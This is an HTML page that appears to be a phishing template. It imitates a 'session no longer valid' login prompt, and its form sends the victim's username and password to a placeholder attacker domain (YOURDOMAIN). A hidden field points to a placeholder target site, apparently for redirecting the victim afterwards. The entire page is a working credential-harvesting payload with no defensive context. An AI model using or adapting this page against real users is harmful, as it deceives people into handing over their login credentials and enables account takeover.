<body><head>
<title>Your session is no longer valid. Please login again</title>
<style>
body {font-family: Arial, Helvetica, sans-serif;}
table {font-size: 1em;}
.red{color:red}
label, input { display:block; }
input.text { margin-bottom:12px; width:35%; padding: .4em; }
fieldset { padding:0; border:0; margin-top:25px; }
h1 { font-size: 1.2em; margin: .6em 0; }
div#users-contain { width: 350px; margin: 20px 0; }
div#users-contain table { margin: 1em 0; border-collapse: collapse; width: 100%; }
div#users-contain table td, div#users-contain table th { border: 1px solid #eee; padding: .6em 10px; text-align: left; }
.ui-dialog .ui-state-error { padding: .3em; }
.validateTips { border: 1px solid transparent; padding: 0.3em; }
</style>
</head><body>
<div id="dialog-form" title="Your session is no longer valid">
<h1 class=red>Your session is no longer valid. Please login again</h1>
<form method="GET" action="https://YOURDOMAIN/revalidate.html">
<fieldset>
<label for="name">Username</label>
<input type="text" name="name" id="name" value=""  autocomplete="off" class="text ui-widget-content ui-corner-all">
<label for="password">Password</label>
<input type="password" name="password" id="password" value="" class="text ui-widget-content ui-corner-all">
<input type=hidden name=reset id=reset value="https://YOURTARGET/">
<input type="submit" name=submit2 tabindex="-1" style="position:absolute; top:-1000px">
<input type="submit" name=submit value="Login">
</fieldset>
</form>
</div>
</body></html>